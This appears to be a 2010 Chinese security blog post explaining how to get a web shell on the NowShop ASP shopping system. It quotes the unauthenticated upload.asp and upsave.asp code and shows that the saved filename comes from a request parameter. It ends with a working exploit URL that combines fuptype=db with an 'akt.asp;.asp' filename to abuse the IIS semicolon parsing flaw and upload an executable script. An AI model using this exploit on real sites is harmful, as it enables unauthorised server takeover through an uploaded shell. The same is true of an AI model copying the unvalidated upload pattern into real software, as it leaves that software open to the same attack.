NowShop直接上传获SHELL

2010, April 8, 6:33 PM. 漏洞分析
Submitted by admin

漏洞出在upload.asp这个页面。
没任何验证
<!--#include file="../include/nowshop.asp"-->
<%
session("fuptype")=request("fuptype")  
session("fupname")=request("fupname")  
session("frmname")=request("frmname")  
Server.ScriptTimeOut=99999
%>
<html>
<head>
<title>文件上传</title>
<meta name="Description" Content="">
<LINK href="../images/css.css" type=text/css rel=stylesheet>
<LINK href="../list/newhead.css" type=text/css rel=stylesheet>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
<body bgcolor="#D9EAFC">
<table align="left"><tr><td>
<form name="form1" method="post" action="upsave.asp" enctype="multipart/form-data">                         //还是调用的upsave.asp
<b>请选择要上传的文件:</b><br>
<input type=file name="file1">
<input type=submit name="submit" value="上传"><br><br>
、、、、、、、、、
</html>

下面看upsave.asp ,还是没验证  ,不过有些版本加了文件限制,不过配合iis那个就完美了
if file.fileSize>0 then
filename=fupname+"."                                            //这个地方
filenameend=file.filename
filenameend=split(filenameend,".")
n=UBound(filenameend)
filename=filename&filenameend(n)
if fuptype<>"db" then
if file.fileSize>200000 then
response.write "<script language='javascript'>"
response.write "alert('您上传的文件太大,上传不成功,单个文件最大不能超过200K!');"
response.write "location.href='javascript:history.go(-1)';"
response.write "</script>"
response.end
end if
end if
if fuptype="adv" or fuptype="pic" then
if LCase(filenameend(n))<>"gif" and LCase(filenameend(n))<>"jpg" and LCase(filenameend(n))<>"swf" and LCase(filenameend(n))<>"htm" then
response.write "<script language='javascript'>"
response.write "alert('不允许上传您选择的文件格式,请检查后重新上传!');"
response.write "location.href='javascript:history.go(-1)';"
response.write "</script>"
response.end
end if
end if
if fuptype="adv" then
savepath="../images/adv/"&filename
elseif fuptype="pic" then
savepath="../pic/digi/"&filename
elseif fuptype="pic1" then
savepath="../pic/digi1/"&filename
elseif fuptype="link" then
savepath="../images/links/"&filename
elseif fuptype="db" then
savepath="./"&filename
下面漏洞利用页面
http://127.0.0.1/admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp
其中akt.asp;.asp就是利用iis解析漏洞。

Tags: nowshop

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):